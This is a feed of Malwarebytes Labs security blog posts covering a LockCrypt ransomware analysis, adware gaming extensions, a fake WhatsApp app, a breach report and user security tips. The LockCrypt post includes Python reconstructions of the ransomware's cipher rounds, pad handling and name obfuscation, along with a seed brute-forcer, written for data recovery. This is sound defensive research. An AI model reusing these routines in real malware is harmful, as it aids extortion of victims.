This is not the case with LinkedIn. Reducing trust to a “yes” or “no” question reduces the barrier to entry for information thieves. It’s a trivial matter to observe a target’s position within the network, join their peripheral interests or third-degree connections, then use the automatic increase in access to appear more trusted in a later attack. There really isn’t an effective defense against this sort of social network attack because it depends on every single member of the network being forever vigilant.

Relationship weighting is arbitrary with no user control

LinkedIn has three levels of relationship weighting: first-, second-, and third-degree connections. The end user has no control over who gets which category, and all three categories are based on network proximity.

Why is this a problem? Because relationships aren’t symmetric. You might have a need for a contact’s email without wanting to disclose full info on yourself. However, network proximity weighting presumes equivalence for all contacts in each class. On the contrary, a second-degree connection might be of only occasional interest, while a first-degree connection might have utility for only a limited time.

Cookie-cutter policies that determine the weight of all your connections rob the end user of the ability to set controls appropriate to each relationship. A great example of this is profile phishing. An attacker only needs to succeed once to become a first-degree connection and gain access to everything.

A very successful honeytrap profile targeting infosec employees

LinkedIn’s security history

LinkedIn has an extensive history of breaches, vulnerabilities, and personal data leaks for both their web and iOS platforms going back many years. At present, they patch quite quickly upon disclosure, but the slow and steady drip of sometimes serious vulnerabilities over years raises some concerns as to whether or not the platform has a culture of security.

Breaches and vulnerabilities happen to everyone. But if they happen publicly and almost annually, the end user might want to think hard before trusting a third party with their data.

The data hoarding

Like some other third party services, LinkedIn doesn’t delete your account. You can “close” it, but the service retains the right to your information indefinitely. So if you “close” your account, and LinkedIn sustains a breach in the future, your data will be there.

Did you forget to opt out of ad targeting before closing? Your data might still be made available for third-party use. The hallmark of a reasonably secure social media platform is control over your own data, and LinkedIn falls short on this. If you’d like to know more about which services will actually delete your data, check out this list from

But I HAVE to use LinkedIn!

You probably don’t. Unless you belong to the handful of industries for which LinkedIn use is standard, a significant number of opportunities still redirect you toward proprietary recruiting platforms, same as always.

If, however, you’re stuck with the service, make sure to log out after each session. Logging out prevents scraping of your network activity, and limits tracking to what you do on the platform. As with most online irritations, ad blockers and anti-tracker extensions can help you keep control of most of your data.

Remember that one of the best defenses against a third-party breach is to think very hard on if you want to trust that third party with your data to begin with. In the case of LinkedIn, the choice is yours. We just want to make sure it’s an informed one.

The post Maybe you shouldn’t use LinkedIn appeared first on Malwarebytes Labs.

Categories: Techie Feeds

LockCrypt ransomware: weakness in code can lead to recovery

Malwarebytes - Wed, 04/04/2018 - 15:00

At the start of the year, it seemed that 2018 was going to be all about cryptominers. They so overwhelmingly dominated the landscape that it looked like no other threat had a chance. However, ransomware is not giving up the field so fast. There have been new variants popping up every couple of months, peering rather shyly around the corner.

At the moment, the most popular ransomware is GandCrab. However, a lesser-known family called LockCrypt has been creeping around under the radar since June 2017. Since it is spread via RDP brute-force attacks and must be installed manually, it has never been a massive threat, and therefore had never been described in detail.

But recently we were contacted by some victims of LockCrypt, so we decided to take a closer look. Our investigation led to some interesting findings, especially once we discovered that the ransomware authors ignored the popular advice not to roll your own crypto. As one might guess, this introduced weaknesses into the code, along with the possibility of recovering the data in some cases.

Analyzed sample


Behavioral analysis

In order to execute properly, the malware must be run as an Administrator. Due to the fact that it is deployed manually by attackers, it doesn’t use any tricks or exploits to automatically elevate its privileges.

Once it is run, it deletes the original sample and drops itself in C:\Windows under the name wwvcm.exe:

It also adds persistence using a registry key:

This ransomware encrypts all the files it can possibly reach. During the process, it enumerates and tries to terminate all running applications so that they will not be blocking access to the attacked files. Executables are also attacked.

The names of the encrypted files are obfuscated—first encrypted and then converted to base64. The random ID is also a part of the name. The extension used is ‘1btc’.

The ransom note is dropped as a TXT file:

Which pops up at the end of the execution.

Looking inside the encrypted files, we saw that they have pretty high entropy. The example below shows a BMP file before and after encryption:

Our initial assessment of the image was that the authors didn’t use a trivial XOR here. It may also look like a file encrypted by stream ciphers (or any ciphers in CBC mode). After looking inside the code, we will know more about it.

Looking at the changes made in the registry, we found more data left there by the ransomware, such as the unique ID of the victim:

Network communication

The malware is capable of encrypting without an Internet connection. However, if we run it on a connected machine, it beacons to its CnC. The CnC IP is (located in Iran).

Here’s a fragment of the communication:

The bot sends base64 encoded data about the attacked machine, such as the random ID, username, operating system, and the path from where the malware was deployed. Example:


Decodes to:

Y8RASU473R6T35c7','Windows 7 Professional|tester|C:\Users\tester\Desktop\lockcrypt.exe
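The check-in data is plain base64 with no additional layer of encryption. A hedged sketch (the function name is ours, not the malware's) of how such a beacon decodes:

```python
import base64

def decode_beacon(payload: str) -> str:
    """Decode a LockCrypt-style check-in: the bot base64-encodes a string
    carrying the victim ID, OS version, username, and deploy path."""
    return base64.b64decode(payload).decode("latin-1")

# Re-encoding the decoded string from the capture reproduces a beacon of the same shape:
info = ("Y8RASU473R6T35c7','Windows 7 Professional|tester|"
        "C:\\Users\\tester\\Desktop\\lockcrypt.exe")
beacon = base64.b64encode(info.encode("latin-1")).decode()
```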

The server sends back a block of bytes that looks like random or encrypted data. We will find out its exact role by looking into the code.

Inside the code

The sample is not packed by any external crypter, nor is it obfuscated. Once we open it, we can directly see all that it has inside.

At the beginning, the ransomware checks the folder from which it is running. It tries to make a copy in the Windows folder and redeploys itself from that location.

Then, it creates a thread that continuously enumerates all the running processes and tries to terminate them.

It reads the registry to check if it was already deployed. Finding the appropriate keys can stop the infection—the malware will recognize the machine as already attacked. Otherwise, it will proceed further.


The infection starts from the attempt to communicate with the CnC.

Looking inside this function, we could now understand the role of the mysterious buffer of bytes seen during the behavioral analysis. The downloaded buffer is validated by its CRC32 checksum, then stored in a global variable for later use by the encryption routine.
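An equivalent integrity check (a sketch in Python, not the sample's own code) is a one-liner:

```python
import zlib

def pad_is_valid(pad: bytes, expected_crc: int) -> bool:
    """Validate a downloaded key pad against its CRC32 checksum, as
    LockCrypt does before keeping the buffer for the encryption routine.
    Masking with 0xFFFFFFFF keeps the result an unsigned 32-bit value."""
    return (zlib.crc32(pad) & 0xFFFFFFFF) == expected_crc
```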

It turns out that this buffer acts as a pad for the encryption scheme. The authors probably wanted to achieve something like a one-time pad. However, they reused the buffer, and because of this, they made their algorithm vulnerable to a known-plaintext attack.

If for some reason downloading the buffer from the Internet is not possible, it is generated by a simple, pseudo-random algorithm:

The authors did not make the best choice for the random generator. Rather than using a cryptographically strong one, they went for the GetTickCount function.
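Why this matters: a pad derived only from a tick count has a tiny effective key space. The sketch below does not reproduce LockCrypt's actual generator (we substitute Python's PRNG purely for illustration); the point is that any generator seeded solely with GetTickCount can be brute-forced once a few pad bytes are known:

```python
import random
from typing import Optional

PAD_LEN = 16  # shortened from the real 2,500-byte pad for illustration

def make_pad(tick: int) -> bytes:
    """Hypothetical stand-in for a GetTickCount-seeded generator: the
    seed is just milliseconds of uptime, so the state space is small."""
    rng = random.Random(tick)
    return bytes(rng.randrange(256) for _ in range(PAD_LEN))

def brute_force_seed(known_prefix: bytes, max_tick: int) -> Optional[int]:
    """Recover the seed by trying every plausible tick value and
    comparing against pad bytes recovered via known plaintext."""
    for tick in range(max_tick):
        if make_pad(tick)[: len(known_prefix)] == known_prefix:
            return tick
    return None
```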

Looking inside the encryption routine, we can see that the file is scrambled by a pretty simple function:

The scrambling algorithm has two different rounds. The reconstructed code of both rounds can be seen below.

Round 1

This round uses only XOR operation, but there is a twist that prevents you from recovering the original key. Although the DWORD from the input is XORed with a DWORD from the key, the input is also tainted with the previous output. On every step, the first half of the input DWORD is taken from the previous output, while only the second half is fresh. That makes it a simple stream cipher.
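A simplified model of that feedback (our own reconstruction of the idea, not a byte-exact copy of the sample's code) shows why it still decrypts cleanly when the key is known:

```python
def round1_encrypt(words, key):
    """Model of LockCrypt round 1: each 32-bit word is XORed with a key
    word, but half of the previous ciphertext word taints the next input,
    turning plain XOR into a simple stream cipher with feedback."""
    out, prev = [], 0
    for i, w in enumerate(words):
        w ^= prev >> 16                      # taint from previous output
        c = (w ^ key[i % len(key)]) & 0xFFFFFFFF
        out.append(c)
        prev = c
    return out

def round1_decrypt(cipher, key):
    """Inverse: undo the key XOR, then remove the taint using the
    previous ciphertext word, which the decryptor also sees."""
    out, prev = [], 0
    for i, c in enumerate(cipher):
        w = (c ^ key[i % len(key)]) ^ (prev >> 16)
        out.append(w & 0xFFFFFFFF)
        prev = c
    return out
```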

Round 2

This round looks more complicated: not only is XOR used here, but also ROL and a bitwise swap. However, there is no input tainting this time, so it is easily reversible.
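A hypothetical reconstruction in the same spirit (the rotation amount and step order here are illustrative, not lifted from the sample) makes the reversibility obvious: with no feedback, decryption is just the inverse steps in reverse order.

```python
def rol32(x, n):
    """Rotate a 32-bit value left by n bits."""
    n &= 31
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def ror32(x, n):
    return rol32(x, 32 - (n & 31))

def swap16(x):
    """Swap the two 16-bit halves of a DWORD (self-inverse)."""
    return ((x >> 16) | (x << 16)) & 0xFFFFFFFF

def round2_encrypt(words, key):
    # XOR with a key word, rotate, swap halves; each word is independent
    return [swap16(rol32(w ^ key[i % len(key)], 5)) for i, w in enumerate(words)]

def round2_decrypt(cipher, key):
    # apply the inverse operations in reverse order
    return [ror32(swap16(c), 5) ^ key[i % len(key)] for i, c in enumerate(cipher)]
```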

Those two simple rounds, together with the “pad” buffer that is 2,500 bytes long, were able to generate the output with pretty high entropy.

File names obfuscation

The names of the files are first XORed with the pad buffer, and then base64 encoded. The offset of the XOR key is 1111 characters from the beginning of the buffer.
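Given a recovered pad, undoing the name obfuscation is straightforward. A sketch (function names and the standard base64 alphabet are our assumptions; the real pad is the 2,500-byte buffer from the CnC):

```python
import base64

NAME_KEY_OFFSET = 1111  # the XOR key starts 1111 bytes into the pad

def obfuscate_name(name: bytes, pad: bytes) -> str:
    """Model of the forward transform: XOR with the pad at offset 1111,
    then base64-encode the result."""
    xored = bytes(b ^ pad[(NAME_KEY_OFFSET + i) % len(pad)] for i, b in enumerate(name))
    return base64.b64encode(xored).decode()

def deobfuscate_name(encoded: str, pad: bytes) -> bytes:
    """Reverse it: base64-decode, then XOR with the same pad slice."""
    raw = base64.b64decode(encoded)
    return bytes(b ^ pad[(NAME_KEY_OFFSET + i) % len(pad)] for i, b in enumerate(raw))
```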

The part of code responsible for this:


LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional.

Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don't take much time preparing the attack or the payload. Instead, they focus on a fast and easy gain rather than on creating something for the long run. Because of this, they can easily be defeated.

The post LockCrypt ransomware: weakness in code can lead to recovery appeared first on Malwarebytes Labs.

Categories: Techie Feeds breach could have impacted millions

Malwarebytes - Tue, 04/03/2018 - 20:53

Customers who signed up for a account in order to order fast-casual baked goods may want to guard their dough. Security researcher Brian Krebs reported yesterday that the website for the bakery chain leaked millions of customer records, including names, emails, physical addresses, birthdays, and the last four digits of customers’ credit card numbers.

Until Monday, millions of customer data points were accessible on the site as plain text—an oversight that Krebs maintains left data exposed for at least eight months. While Panera was contacted by security researcher Dylan Houlihan back in August 2017 about the leak, it appears they did not take action to fix it, despite reassurances they were working on a resolution.

Once Krebs notified Panera about the breach, the company took its website offline for a brief period of time. When the site came back online, the customer data was no longer available.

Panera issued statements to the press that they moved to fix the breach hours after Krebs reached out to them, though they didn’t address the eight-month gap in action from their first notification. In addition, they stated that only 10,000 customer records were exposed, though researcher HoldSecurity claims it’s more like 37 million.

While this story is still developing, we urge our readers to take necessary precautions to protect their data. An unprecedented season of breaches in 2017 gave way to more breach discoveries in early 2018, with companies such as Orbitz, Lord & Taylor/Saks Fifth Avenue, and MyFitnessPal collectively exposing more than 155 million users.

Recognize that while the flood of data breaches in itself is alarming, we still haven’t seen the full potential for the consequences of giving such valuable data freely to the black market. As tax season comes to a close, for example, we may be poised for a deluge of fraudulent claims and identity theft as criminals try to cash in on their data. Because of this, we suggest taking similar steps as after the Equifax breach, which includes monitoring credit reports, staying on high alert for email, phone, or text scams, and enabling alerts on your accounts.

The more we see infringements of the size and proportion of the breach, the more we caution users to just assume their data has been compromised. Right now, the best we can do—until companies buckle down harder on security and privacy protocols—is to caution everyone to protect their data from being used to harm them.

Stay safe, everyone.

The post breach could have impacted millions appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malicious gaming extensions: a child’s play to infection

Malwarebytes - Tue, 04/03/2018 - 15:30

Did you ever lend your laptop to a child to play a video game, only to get it back filled with advertisements? Our CEO knows a little bit about that predicament, having unknowingly infected his parents’ computer when he was a kid. But times have changed since then.

Let us play for you a modern-day scenario, then, to show how it’s a short trip from “I want to play this game” to “Hey, there’s adware on my laptop!”

How to get infected playing a video game

These days the coolest kids at school aren’t playing football—they’re playing video games. Of course, your kid wants to be the best in a popular game like So he grabs the family laptop and does a search for “always win slither.”

Look at the top search result: a YouTube video by a well-known YouTuber named Jelly, who has 7,866,496 subscribers tuning into his gaming channel. If you were a gaming portal, would you think it’s worth the investment to pay AdChoices to get a relevant advertisement on that page?

Well-placed advertising always pays off.

With its prominence and high potential for pay-off, the answer is decidedly “yes,” especially if your intentions are less than ethical. Normally, the game is free to play, but who is going to stop you from creating a landing page that says you have to install this browser extension before you can play?

Advertising networks certainly won’t. In order to advertise online, businesses must merely sign up with a network and then bid in real time to have their ads appear on popular websites. However, not all advertising networks have strict criteria for advertisers—ad sellers don’t always know the buyers. Not only that, but buying advertising space is increasingly being transacted automatically, which leaves the door open for further mischief.

Install the extension, even though the game is completely free, why don’t you?

So, back to our kid. Remember, he just learned how to beat all his friends, so he’s eager to get going. He downloads the extension at the upper right-hand side of the screen because it’s the closest thing resembling a “play” button. What harm is a little extension going to do?

All it can do is “Read and change all your data on the websites you visit,” after all.

Wait, what?

Yes, it knows which websites you visit, gathering all the data about your surfing behavior. And yes, it can use that information to insert relevant advertisements on those sites. And unfortunately, that’s exactly what these extensions do. So we have a question for your kid, who’s about to install this extension on your laptop:

Do you treat advertisements on the site of your favorite gaming portal with the same level of trust as the ones on a random Facebook page? Or do you trust one site’s ads over the other?

If the answer isn’t clear here, then we might need to supply further instruction on the psychology behind successful marketing: The power to insert advertisements on sites that your target audience trusts is a desirable one—one that cybercriminals would gladly pay for.

And pay they did, aiming their advertising campaigns at games that attract a relatively young audience, including, HappyWheels,, Subway Surfers, MineCraft, and BlockWorld, among others.

What does the malicious browser extension actually do?

Now that the line of infection is clear, let’s talk numbers.

Because their advertising landing pages are so prominent and well-placed, gaming extensions bring in a lot of traffic to Chrome’s Webstore. The GamerSuperstar extension, for example, has been installed almost 100,000 times.

If you download the extension directly from Webstore, you probably have a better idea of what its capabilities and permissions are by scrolling through the product descriptions and reading user reviews. This is not true, however, if you just click prompts from an advertising landing page. And that’s how these criminals pull the wool over users’ eyes, getting thousands to download without realizing what they are getting into.

And what they’re getting into is a whole lotta adware.

The extension does absolutely nothing to change the gameplay—it’s completely unnecessary. All you gain by installing most of these extensions is targeted advertising on the sites you visit. A select few also alter your search and newtab settings.

ArcadeTab comes with a search newtab

Other malicious gaming extensions

I wish we could say that GamerSuperStar was the only example of a malicious gaming extension that we have come across. Over the last few months, however, we’ve tracked quite a few of them.

  • Search Web by 1 million+ installs (and this one also qualifies as a search and newtab hijacker)
  • ArcadeFrontier Ads by 150,000+ installs
  • GamesChill Ads by 100,000+ installs
  • PlayZiz Advertisements by 40,000+ installs
  • Gamerscan Ad by 25,000+ installs
  • ArcadeGala Advertising Offers by 5,000+ installs
  • VideoGameHub Advertising by 1,500+ installs

One note about the above: Data for Chrome extensions are a lot easier to track down because of their Webstore listing. We know there are Firefox and Safari extensions as well, but we can only guess at the numbers for Firefox and Safari extensions that were installed.

So these other extensions—no way they could be more aggressive on permissions than GamerSuperStar, right? Wrong. It was among the least demanding extension of its kind.

This was the most demanding extension permissions list we saw.

Remediating the infection

Although thousands of people were fooled into downloading these data-gathering extensions, it’s easy enough to get rid of them. If you look at the uninstall page for GamerSuperStar on Chrome, you can see there are removal instructions for Firefox and Safari extensions as well.

In addition, Malwarebytes can block many of these kinds of extensions from being downloaded in the first place, since they fetch their advertisements from the servers, which have been at the top of our block list consistently for the last few weeks.

The paid version of Malwarebytes blocks the domain

Malwarebytes also detects the extensions involved. Most of them are under the generic detection name Adware.Cmptch.Generic. You can find a removal guide for GamerSuperstar and a ArcadeTab on our forums.

Caught red-handed

The common pattern that we found for all these extensions is that they advertise their gaming portal heavily, and when clicking on the ads to arrive at the portal, you will instead be prompted to install an extension before you can play. If you visit the portal directly, however, you can jump straight in and start playing without being bothered.

Even though it’s hard to prove that these extensions are all coming from the same source, the similarities between the ways in which they are pushed and their target audience make us believe that they are at least closely-related. We also found similar domains and extensions acting suspiciously, but since we didn’t catch them in the act, we will not list them here.

But rest assured…we’re keeping an eye on them.


Chrome extensions:

obpnlclobfjomjabiibfnbfmebenjedp peglehonblabfemopkgmfcpofbchegcl dehhfjanlmglmabomenmpjnnopigplae anaojjlbaalfefdgonnpmcpgpeafkdig eogmpgppidehapppmipeahegomlindkg piblbljcjideclibhpjobcaakomfcdnf kfljkfcdekakneakneabhomcpmgfpbdc flpdiedhjcapelfbeffompkoeilgmkhm

Firefox extension:



The post Malicious gaming extensions: a child’s play to infection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Fake WhatsApp can steal info from your phone

Malwarebytes - Mon, 04/02/2018 - 17:00

Last month, a blogger at My Online Security reported receiving a spam comment containing WhatsApp Plus. Going through the process, they downloaded an APK of this so-called WhatsApp Plus. Where they ended was as stated,

I am not certain exactly what this does, but from the sandbox reports it looks like it has the potential to steal information, photos, phone numbers etc from your mobile phone.  

Indeed, they are correct, as this is a variant of Android/PUP.Riskware.Wtaspin.GB, a Fake WhatsApp riskware that dates back to mid-2017.  But what makes this variant unique is where it leads us.

Whats in a Fake WhatsApp?

As our dear My Online Security blogger did, I too went through the process and downloaded/installed the APK aforementioned in the linked blog. Upon opening the app is the following greeting:

Of special interest is the gold logo in the middle with a URL and handle. Onward, I clicked on AGREE AND CONTINUE to find, oh no, I was out of date!

The message states, Please go to Google Play Store to download latest version — nah, I’d rather click the DOWNLOAD button. Where I was redirected was intriguing.

Into another realm of Fake WhatsApp

Where I landed was on the above URL from the shiny gold logo. Everything on the webpage is written in Arabic.

Here I was on the official website to download Watts Plus Plus WhatsApp—that unusual name could very well be an awkward Google translate, by the way.  Among numerous ads (a developer needs to make some ad revenue after all) was text explaining this developer’s WhatsApp version. Below is the (very) rough translation, with minor condensing to the most pertinent information:

What is Watts Plus Plus Whatsapp Plus?

Is a copy of WattsPlus developed by Abu, there may be no confidence in some users in the download of Whatsapp Plus, but this version has been checked files Wats through special programs and the result is positive is safe , and the version of Watts Plus is updated Abu periodically for the  last issue is a special version of the fans of Watts AP Plus:

Secure:  The antivirus software code has been checked, the Watsp files are encrypted in the Watspec servers and cannot be decrypted and can only be decrypted by Wattsp itself.

Updated to the latest version:  Watts August the company issued almost every two days a simple update, and is almost updated copies of our own every two months periodically until the copies contain only critical updates.

Four numbers in the same phone: In this version you can run up to four numbers in the same phone without a routine or any difficulty


Hide the last appearance of friends completely with the property of hiding the reading and reception, and the disappearance of the current writing and running and hide that you have played a clip and your voice. And hide that you watched the case of your friend (Alasturi).

The possibility of changing the program line completely to many of the ready lines

Provides the security feature of the application by placing a secret number cannot open the application without it.

Provides security for conversations by placing a secret number cannot open the conversation without him.

You can send more than 100 photos at once to your friends.

And many other features

Hide what you saw the situation:  You can in the latest version of WhatsApp + WhatsApp Plus WhatSapp Plus AbuSamad AlRifa’i Hide that you watched the status of friends from privacy options from the top menu.

What is the best feature in WhatsApp Plus WhatsApp Plus What isApp Plus Abu Sadam Rifai  If we activate this option, no one will be able to see you online forever and will not show the date of your last appearance and no one will know you are online even while you are on the wattage .

Hide the second health:  The sender of the messages will not be able to tell you that you received the message.

Hides the blue ones:  The sender cannot tell you that you read the message but in return you know that he has read the messages and only shows you the blue ones.

Hide the current writing:  You can also in the new version and the latest version of WhatsApp + WhatsApp Plus whatsapp plus Abu Saddam Al – Rifai  hide hiding or typing on the other end of the conversation.

Hides recording:  When recording a track.

Hide playback signal:  ie, the sender cannot tell you have listened to the audio track.

Two-way operation:  You can run two versions of Wattsp on one device without a router by downloading Watts 1 and Watts 2.

See the status of people without entering the conversation:  You can see the status of people connected or last seen from the main screen of the program.

What stood out to me was all the abilities to hide oneself in various ways—very spy-like behavior.

Onward to the next version

Sifting through all the ads stating they were the download button, I finally came across the true download link. After updating, I once again came to the same screen shown above with the gold logo. This time, after pressing the AGREE AND CONTINUE button, the next screen asked to verify a phone number.

After doing so, a changelog appeared with fixes to the app’s hiding features.

Click to view slideshow.

Clicking OK to the changelog, what appears to be a functioning version of WhatsApp opens.

Click to view slideshow. WhatsCode…ur…what’s in the code

The incriminating code of Android/PUP.Riskware.Wtaspin.GB is within receivers, services, and activities starting with This code is in various fake WhatsApp APKs. The only difference of the aforementioned version from above is the code points to the Arabic webpage to update.

After analyzing several different versions of PUP.Riskware.Wtaspin.GB, it appears all have different URLs from which to update. Thus, everyone is just copy catting the original source code and adding their own “update” website. So, who is the original author of this riskware? Is the Arabic developer, Abu, the originating author?

The code of this riskware is complex. The webpage of the developer claiming to be owner—not so complex. Although I won’t completely rule out the possibility, let’s just say I am skeptical.

No matter the true author or origin of this fake Whatsapp, I suggest sticking with the real WhatsApp on Google Play. Although Google Play has its faults, it’s tremendously safer than some of the sources I came across researching this riskware. Stay safe out there!

The post Mobile Menace Monday: Fake WhatsApp can steal info from your phone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (March 26 – April 01)

Malwarebytes - Mon, 04/02/2018 - 16:03

Last week, we looked at the thought process behind creating a ransomware decryptor, the inner workings of QuantLoader, the ways one can protect their Android devices, the exploit kits we have encountered this winter, the now-known epidemic of data breaches, the coming of TLS 1.3, and the ways one can protect their P2P payment apps.

Other news
  • “Lone wolf” sextortionists pose as hot women behind fake Facebook profiles. (Source: Sophos’s Naked Security Blog)
  • Sad fact: Willing victims of romance scams actually do exist. Not only do they send money to “their partner” whom they haven’t met yet but they also knowingly act as mules. (Source: Security Week)
  • While a majority of IT pros recognize that IoTs are so insecure, not that many are actually doing anything about it. (Source: ZDNet)
  • What happens when you send an application into the background? This SANS diary attempts to answer that. (Source: SANS ISC InfoSec Forums)
  • Well, will you look at that—Monero isn’t that untraceable after all. (Source: Wired)
  • A flaw in the iOS camera application with the way it handles QR codes can be used to redirect users to malicious destinations. (Source: HackRead)
  • Cryptojacking via browsers has been around for a while, and it’s getting more difficult to spot them. (Source: Bleeping Computer)
  • Tax season is getting really close, so scams surrounding this are active with varying payloads. (Source: Proofpoint Blog)
  • As it happens, Under Armor has left some areas uncovered, causing MyFitnessPal to be compromised and affecting 150 million accounts. (Source: The Verge)
  • ‘Cyber bullets’? Cyber bullets! (Source: Fifth Domain)

Stay safe, everyone!

The post A week in security (March 26 – April 01) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

You down with P2P? 10 tips to secure your mobile payment app

Malwarebytes - Fri, 03/30/2018 - 16:00

If you look at the figures, you cannot deny that the eCommerce industry is steadily growing. More and more people are doing their shopping online, not only for products and services geared toward the use of technologies and the Internet, but also for items previously only found in brick and mortar stores—groceries, clothing, and, of course, books.

But within the eCommerce market, a submarket is springing to life. Mobile payment, in particular, appears to be making its way to mainstream adoption in certain parts of the globe. So how does it work? And how can we make sure our mobile transactions, just as our other online payments, are secure?

Mobile payment methods

Mobile payment is a regulated digital transaction that uses mainly smartphone devices to pay for goods and/or services. This kind of undertaking is supported by apps that act as mobile wallets, which are tied to users’ bank accounts.

There are many forms of mobile payment in use today. In countries like South Korea, Japan, Poland, and Romania, the use of direct mobile billing (also called “direct to bill”) is the norm. SMS payments, which charities use to get people to donate, QR code payments, mobile web or Wireless Application Protocol (WAP) payments, and Near Field Communication (NFC) payments are other examples.

Perhaps the most notable form of mobile payment that has shown growth and popularity across generations, especially among younger Americans, is peer-to-peer or person-to-person (P2P) payment. This method, which can also be used on desktop and laptop devices, allows people to send and receive money to and from a friend or family member. (Splitting restaurant tabs and house bills among people in your circle has never been easier.) PayPal, Square Cash, and Venmo are just some of the apps that offer P2P services. Google, Facebook, and Snapchat have also jumped on the bandwagon.

You may wonder: Why is P2P being adapted so quickly and widely? According to Bank of America’s 2017 Trends in Mobility Consumer Report [PDF], convenience and time saving are the primary motivators for adoption, followed by peer influence.

Trust (and security) issues with P2P apps

Using a P2P payment app is like having a fast, always-on-call middleman. But, like any other app, it is not without its security and privacy issues.

In 2015, mobile app security and analytics company Bluebox Security (now part of Lookout) published a report revealing that security in mobile payment apps is surprisingly not as robust as one might expect. For example, the top two P2P payment apps they analyzed only use basic security protocols. They also found that these apps were vulnerable to tampering and exploitation of code libraries. Furthermore, user information in the app, along with authentication info and transaction history, are visible should threat actors successfully gain access either to the app or to the smartphone device.

While addressing security and privacy concerns surrounding P2P apps rests in the hands of the companies offering these services, users must for now play their part in securing their personal information and banking details.

Living life with P2P (yeah you know me)

Risks are always present in devices and online services we’ve grown to rely on. To a degree, their presence shouldn’t be our only basis for making informed decisions. If using a P2P payment service is unavoidable because your family or friends use it, we can help you navigate through the process of deciding which app may be a good fit for you—bearing privacy and security in mind—so you won’t have to worry much about it in the future:

1. Look into the P2P app your friends and/or family are using. It’s effortless and practical to just go with the same app they use. Now may be good as good a time as any to do your own research on whether their app has the security and privacy features you’re after (e.g., multi-factor authentication).

Remember that no two P2P apps are alike. If you’re not satisfied with their app (e.g., the fee for sending and receiving money isn’t sound, or user data isn’t encrypted), you can jot down those you’re happy to suggest to them instead. You might even convince them to use an alternative app. Start a conversation by sharing your thoughts and findings and hearing theirs.

2. Download only the legitimate P2P payment apps. Regardless of your app of choice, users should always download them from recognized and legitimate mobile app markets like Google Play and the Apple App Store. Banks and other private organizations (like Starbucks) who offer a P2P service also have links to their apps on their websites that users can access.

3. Carefully review the app’s terms of service (ToS) before signing up. In particular, look for the sections on how they settle dispute and complaints and how your information is used, stored, and processed. This should be stated clearly (especially now, as transparency is part of GDPR compliance). It takes time to review and digest the ToS, yes, but it’s always better to take a little extra time up front to save yourself the headache later.

Read: Make way for the GDPR: Is your business ready?

4. Don’t settle for the default. Some P2P payment apps have pre-set security privacy settings, and a majority of users don’t take the time to review them. Ideally, users should crank up these settings to the highest to achieve maximum security and privacy. Also, make sure you enable notifications for any transactions made under your account and any changes to your details or credentials to clue you into potential events of fraud.

5. Favor bank accounts over or non-bank ones. One can tie in their P2P payment app to banks, credit cards, and non-bank financial institution (NBFI) accounts. However, the Federal Deposit Insurance Corporation (FDIC) has advised that it’s best for P2P users to tie their checking accounts or credit cards with their app, so they are insured if something goes horribly wrong. User funds lost or stolen from non-bank institutions may not be legally protected at all.

6. Set up a password to access your P2P app. Not all P2P apps have this feature, but if yours does, lock it up with a PIN or password. This’ll give anyone a difficult time getting your money from the app should you misplace or lose your phone.

7. Set your account to private. Some P2P service providers included a social networking feature in the app where one can see transactions and activities from contacts in the app’s feed. Not the best idea to make those public. Setting your account to private will prevent anyone from following your activities in their feed.

8. Avoid sending money to and receiving from people outside your circle. This mainly applies to the buyer-seller dynamic. A buyer (or scammer) may likely cancel the P2P transaction after receiving the product bought and before their money is debited from their account. This is called a transaction reversal scam.

9. Avoid carrying a balance. Some P2P services allow you to keep a certain amount of money stashed away to a P2P account for an indefinite length of time, like having a digital wallet. Admittedly, this is super convenient; however, it is not as safe as having money in your bank. If money launderers are able to siphon out money from your stash, it’s highly unlikely you’ll get it all back, as a majority of P2P services aren’t FDIC insured.

So if and when you receive money from someone, cash it out immediately, if possible, or move it to a digital wallet like Google Wallet, which has fraud protection in place.

10. (Optional) Open a separate account you can exclusively tie to your P2P payment app. First-time investors are usually advised to not put all their eggs in one basket. In this case, one should consider setting aside a certain number of eggs they would need for P2P transactions.

And let’s not forget…

Keeping your smartphone secure adds a layer of protection to the data and apps it holds. Does your phone have a lock? The majority of smartphone users don’t typically lock their devices, making such devices easier to access if stolen. Set up a lock now. While you’re at it, make your PIN more challenging. (No, 1-2-3-4 is not a good PIN.) Also, be wary of shoulder surfers when opening your phone to use your P2P payment app.

Now that you’re using a P2P service, you should start proactively monitoring your account regularly for unusual activity, the same way you’d do with your actual bank account or credit card. And finally, install mobile security software and tracking software with remote wipe features if you haven’t already.

Adhering to these steps won’t necessarily keep all P2P payment app security and privacy issues at bay. However, in an age when digital threats are sophisticated and scammers are astute, a device can never be too secure, and their owners never too careful.

Stay safe!

The post You down with P2P? 10 tips to secure your mobile payment app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

TLS 1.3 is nearly here

Malwarebytes - Fri, 03/30/2018 - 15:00

TLS stands for “Transport Layer Security” and it’s rather important. Why’s that? Oh, I’m glad you asked. Here’s me, yelling my password across the office to you:


You heard me loud and clear, right? But so did basically anyone else nearby. Now let’s work in a little TLS love and attention, and yell again:

“Large pile of nonsense where the password should be!”

Wow! What happened? Imagine my endlessly yelled password is available to really clever people, uh, standing outside my window listening in. Imagine someone soundproofed said room to enable continued, secure, password yelling. I can yell “Password!” at you all day long, and all anyone else will hear is garbage.

That, in a roundabout “analogy crashing to the ground” sort of way, is TLS. It’s a cryptographic protocol that keeps your communications secure as they make their way from point A to point B. It’s very hard to intercept, listen in, or crack.

Here comes TLS 1.3

SSL—Secure Socket Layer—came about in 1995 with version 2.0, courtesy of Netscape. Over the years, it slowly morphed into something else, becoming TLS in 1999. After more alterations and updates, TLS 1.2 came about in 2008, and we’ve been running with it ever since.

Now, after four years of work and 28 revisions, TLS 1.3 is almost ready to make its debut. This new version makes alterations to how HTTPs connections work, and the Internet Engineering Task Force have stated that it “…will enable client and server applications to communicate over the Internet in a way that is designed to prevent eavesdropping, tampering, and message forgery.”

Bad news for scammers, and quite possibly also for high-level law enforcement operatives with a hand in computer-based digital observation. Outdated encryption is also out the window, with TLS 1.3 consigning long-term broken forms of encryption to the dustbin.

What’s changing with TLS

